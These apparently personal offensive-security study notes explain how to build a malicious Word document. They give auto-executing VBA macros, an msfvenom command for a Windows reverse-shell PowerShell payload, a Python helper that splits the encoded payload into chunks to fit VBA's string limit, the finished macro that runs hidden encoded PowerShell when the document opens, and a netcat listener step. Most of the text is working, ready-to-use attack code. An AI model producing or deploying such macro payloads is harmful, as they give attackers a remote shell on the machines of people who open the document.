Macro manually

Microsoft Office applications like Word and Excel allow users to embed macros,

Create macro using , View>Macros
VBA code in macro to execute cmd. Here AutoOpen and Document_Open is udes to execute macro automatically when document open

<aside> ➖ Sub AutoOpen()

  MyMacro

End Sub

Sub Document_Open()

  MyMacro

End Sub

Sub MyMacro()

   CreateObject("Wscript.Shell").Run "cmd"

End Sub

</aside>

<aside> 💡 1. Remember to save in .doc (word 97-2003 document) or .docm format . it won’t work in .docx and click enable macro option when doc opens 1st time 2. remember to select current document when creating macro

Untitled

</aside>

Now, create macro for powershell

create payload and copy only “powershell.exe …………” part from it sudo msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f hta-psh OR
Then put the copied payload in python script and execute it to split the commands as vba has 255 character limit

<aside> 🐍 str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC....."

n = 50

for i in range(0, len(str), n): print "Str = Str + " + '"' + str[i:i+n] + '"'

</aside>

FInal vba macro code look like

<aside> ➖ Sub AutoOpen() MyMacro End Sub

Sub Document_Open() MyMacro End Sub

Sub MyMacro()

Dim Str As String
Str = "powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZ"
Str = Str + "QB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQB"
Str = Str + "TAHQAcgBlAGEAbQAoACwAWwBDAG8AbgB2AGUAcgB0AF0AOgA6A"
Str = Str + "EYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAEg"
Str = Str + "ANABzAEkAQQBBAEEAQQBBAEEAQQBFAEEATAAxAFgANgAyACsAY"
Str = Str + "gBTAEIARAAvAG4ARQBqADUASAAvAGgAZwBDAFoAQwBJAFoAUgB"
...
Str = Str + "AZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0Ac"
Str = Str + "AByAGUAcwBzACkADQAKACQAcwB0AHIAZQBhAG0AIAA9ACAATgB"
Str = Str + "lAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtA"
Str = Str + "FIAZQBhAGQAZQByACgAJABnAHoAaQBwACkADQAKAGkAZQB4ACA"
Str = Str + "AJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAVABvAEUAbgBkACgAK"
Str = Str + "QA="

CreateObject("Wscript.Shell").Run Str

End Sub

<aside> 💡 Also there are python script to create vba_macro code authomatically

</aside>

Saving the Word document, closing it, and reopening it will automatically execute the macro. And open netcat listener nc- nvlp <port>